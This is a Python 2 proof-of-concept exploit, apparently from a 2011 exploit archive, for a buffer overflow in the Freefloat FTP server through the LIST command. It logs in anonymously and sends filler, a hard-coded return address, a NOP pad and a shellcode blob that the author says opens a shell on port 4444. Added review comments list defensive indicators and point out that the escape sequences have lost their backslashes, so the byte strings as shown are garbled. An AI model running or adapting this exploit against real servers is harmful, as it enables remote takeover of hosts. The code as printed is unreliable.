
Freefloat FTP Buffer Overflow

Posted on 12 July 2011

#!/usr/bin/python
# Proof-of-concept for a buffer overflow in the Freefloat FTP server, reached
# through the argument of the FTP LIST command (per the banner text below).
# The script is written for Python 2 (print statements, str used as bytes).
#
# NOTE(review): the string literals below ("x41", "x90", the shell blob, and
# the FTP command terminators) look like escape sequences whose backslashes
# were lost when the page was rendered. They are reproduced exactly as they
# appear on the page and are not the literal bytes the author intended.
#
# What a defender can take from this listing:
#   * Wire pattern: anonymous login (USER/PASS anonymous) followed by a single
#     LIST command whose argument is several hundred bytes long. A legitimate
#     LIST argument is a path; a length limit on FTP command lines at a proxy
#     or IDS covers this class of request.
#   * Host pattern: the closing message tells the operator to connect to
#     TCP 4444 on the target, so an unexpected listener on that port on an
#     FTP host is a follow-on indicator.
#   * The overwrite value is a hard-coded 32-bit address, so the script
#     presumably depends on one specific OS/library build with fixed module
#     bases; ASLR and DEP on the host would presumably break it as written.
#     TODO confirm against the affected platform.
from struct import pack
import socket,sys
import os  # imported but not referenced anywhere in the visible script

# Author banner; "Freefloat FTP [LIST] Buffer Overflow Exploit" names the
# target product and the command that carries the oversized argument.
print " ||=============================================================||"
print " || ||"
print " || / 0-Exploit (Zer0 Thunder) ||"
print " || ,, / /--------------------------------------------||"
print " || '-.`()/`.-' =========================== ||"
print " || .--_'( )'_--.Freefloat FTP [LIST] Buffer Overflow Exploit||"
print " || / /` /`**` ` ----pwn the shell---- ||"
print " || | | >< | | ||"
print " || / / ||"
print " || '.__.' ||"
print " || ||"
print " ||=============================================================||"

# Exactly two arguments are required: target address and TCP port.
if len(sys.argv) != 3:
    print "Usage: ./freeftp.py [IP] [PORT]"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])  # raises ValueError on a non-numeric port

# Filler repeated 246 times; presumably the distance from the start of the
# LIST argument buffer to the saved return address -- TODO confirm.
junk = "x41" * 246
# One 32-bit little-endian value placed directly after the filler. It is a
# fixed address, which ties the script to a particular memory layout.
add = pack('<L',0x77c35459)
# Twenty-unit pad between the overwrite value and the payload blob.
nops = "x90" * 20
# Opaque payload blob supplied by the author. Its behaviour is not visible
# from this listing; the final status message implies it is expected to open
# a listener on TCP 4444 -- treat that as the author's claim, not a finding.
shell= ("x33xc9x83xe9xaaxe8xffxffxffxffxc0x5ex81x76x0e"
"xbbxc1x9cx35x83xeexfcxe2xf4x47x29x15x35xbbxc1"
"xfcxbcx5exf0x4ex51x30x93xacxbexe9xcdx17x67xaf"
"x4axeex1dxb4x76xd6x13x8ax3exadxf5x17xfdxfdx49"
"xb9xedxbcxf4x74xccx9dxf2x59x31xcex62x30x93x8c"
"xbexf9xfdx9dxe5x30x81xe4xb0x7bxb5xd6x34x6bx91"
"x17x7dxa3x4axc4x15xbax12x7fx09xf2x4axa8xbexba"
"x17xadxcax8ax01x30xf4x74xccx9dxf2x83x21xe9xc1"
"xb8xbcx64x0exc6xe5xe9xd7xe3x4axc4x11xbax12xfa"
"xbexb7x8ax17x6dxa7xc0x4fxbexbfx4ax9dxe5x32x85"
"xb8x11xe0x9axfdx6cxe1x90x63xd5xe3x9exc6xbexa9"
"x2ax1ax68xd3xf2xaex35xbbxa9xebx46x89x9exc8x5d"
"xf7xb6xbax32x44x14x24xa5xbaxc1x9cx1cx7fx95xcc"
"x5dx92x41xf7x35x44x14xccx65xebx91xdcx65xfbx91"
"xf4xdfxb4x1ex7cxcax6ex48x5bx04x60x92xf4x37xbb"
"xd0xc0xbcx5dxabx8cx63xecxa9x5exeex8cxa6x63xe0"
"xe8x96xf4x82x52xf9x63xcax6ex92xcfx62xd3xb5x70"
"x0ex5ax3ex49x62x32x06xf4x40xd5x8cxfdxcax6exa9"
"xffx58xdfxc1x15xd6xecx96xcbx04x4dxabx8ex6cxed"
"x23x61x53x7cx85xb8x09xbaxc0x11x71x9fxd1x5ax35"
"xffx95xccx63xedx97xdax63xf5x97xcax66xedxa9xe5"
"xf9x84x47x63xe0x32x21xd2x63xfdx3exacx5dxb3x46"
"x81x55x44x14x27xc5x0ex63xcax5dx1dx54x21xa8x44"
"x14xa0x33xc7xcbx1cxcex5bxb4x99x8exfcxd2xeex5a"
"xd1xc1xcfxcax6exc1x9cx35")
# Final LIST argument layout: filler, overwrite value, pad, payload blob.
payload = junk+add+nops+shell

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[+] Target FTP Connected!"
except:
    # Bare except: any failure to connect is reported the same way.
    print "[!] FTP didn't respond "
    sys.exit(0)

# Read the server greeting, then log in with the anonymous account. The
# vulnerable command is therefore reachable without real credentials whenever
# anonymous access is enabled on the server.
s.recv(1024)
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS anonymous ')
s.recv(1024)
print "[+] Sending payload..."
# The oversized argument is delivered in a single LIST command.
s.send('LIST ' + payload + ' ')
s.recv(1024)
print "[!] Exploit has been sent!. Please try telnet [target ip] 4444 "
# Outcome is guessed from the control connection alone: a successful read is
# reported as failure and any socket exception as success.
try:
    s.recv(1024)
    print "[!] Exploit failed !."
except:
    print "[+] Pwned the shell !"
s.close()

 
